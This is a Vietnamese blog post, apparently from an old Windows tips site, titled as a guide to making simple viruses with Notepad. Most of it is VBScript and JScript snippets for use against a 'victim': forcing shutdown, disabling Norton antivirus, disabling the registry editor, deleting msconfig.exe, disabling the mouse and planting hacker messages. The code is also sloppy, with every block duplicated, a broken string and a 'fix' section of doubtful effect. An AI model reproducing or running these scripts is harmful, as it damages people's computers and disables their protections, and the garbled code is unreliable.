Khôi phục mật khẩu Administrator trong Windows XP
Khắc phục hiện tượng máy bị Restart liên tục
Jul
27
Tạo virust đơn giản với Notepad hay Wordpad
23:00 
http://images.vietnamnet.vn/dataimages/2..." target="_blank">
http://images.vietnamnet.vn/dataimages/2..." class="insertimage" alt="Bấm xem ảnh ở cửa sổ mới" title="Bấm xem ảnh ở cửa sổ mới" border="0" onload="if(this.width>500) {this.resized=true; this.width=500;}" align="right" width="120" height="120"/>Chỉ với Notepad hay Wordpad bạn có thể tự tạo cho mình 1 vài "chú" Virus đơn giản dưới dạng _VBSCRIPT hoặc _Javascript.
Dưới đây là code của một số con virus nhỏ dưới dạng VBS:
1. Không cho victim khởi động máy:
2. Disable NAV:
3. Hiển thị một message mỗi khi reboot máy:
4. Hiển thị một dòng lệnh khi click vào file hay folder:
5. Làm cho các trò trên hoạt động bình thường:
Dưới dạng Javascipt:
Đánh giá bài viết
Dưới đây là code của một số con virus nhỏ dưới dạng VBS:
1. Không cho victim khởi động máy:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
2. Disable NAV:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"
3. Hiển thị một message mỗi khi reboot máy:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Ta la hacker day - Ta den tu DHTB"
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Ta la hacker day - Ta den tu DHTB"
4. Hiển thị một dòng lệnh khi click vào file hay folder:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Ban da bi toi khong che"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Ban da bi toi khong che","I_LOVE_U"
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Ban da bi toi khong che"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Ban da bi toi khong che","I_LOVE_U"
5. Làm cho các trò trên hoạt động bình thường:
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\CurentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\CurentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Dưới dạng Javascipt:
var wsh;
wsh=new ActiveXObject ("Wscript.shell");
// Winlogon when reboot
var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Ban da bi toi khong che") ;
//Disable Registry
var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Windows\\CurrentVersion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");
//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn
var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;
//Shutdown windows
//Disable Mouse
wsh.run ("RUNDLL32.EXE mouse,disable");
//Hang up windows
wsh.run ("rundll32 user,disableoemlayer");
wsh=new ActiveXObject ("Wscript.shell");
// Winlogon when reboot
var s1 = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Ban da bi toi khong che") ;
//Disable Registry
var s1 = "HKEY_USERS\\.Default\\Software\\Microsoft\\Windows\\CurrentVersion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");
//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn
var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;
//Shutdown windows
//Disable Mouse
wsh.run ("RUNDLL32.EXE mouse,disable");
//Hang up windows
wsh.run ("rundll32 user,disableoemlayer");
Đánh giá bài viết
Các bài viết liên quan:
AVG Internet Security 9.0 Build 819a2842
Tăng tốc độ copy dữ liệu cho USB
WinStyle 2010 MultiBoot - Bản Win XP3 Rất Đẹp
Cài đặt Windows qua mạng LAN
5 Premium Rapidshare Account
Virtual windows XP VM lite for Windows 7
Chuyển Recycle Bin vào Taskbar trong Windows 7
Ứng dụng web hữu ích: Word2Text và SafeShare.TV
Cách download trên Box.net nếu chẳng may đã hết Bandwidth
Bí quyết để PC cũ chạy tốt
AVG Internet Security 9.0 Build 819a2842Tăng tốc độ copy dữ liệu cho USBWinStyle 2010 MultiBoot - Bản Win XP3 Rất ĐẹpCài đặt Windows qua mạng LAN5 Premium Rapidshare AccountVirtual windows XP VM lite for Windows 7Chuyển Recycle Bin vào Taskbar trong Windows 7Ứng dụng web hữu ích: Word2Text và SafeShare.TV Cách download trên Box.net nếu chẳng may đã hết BandwidthBí quyết để PC cũ chạy tốt
RSS 
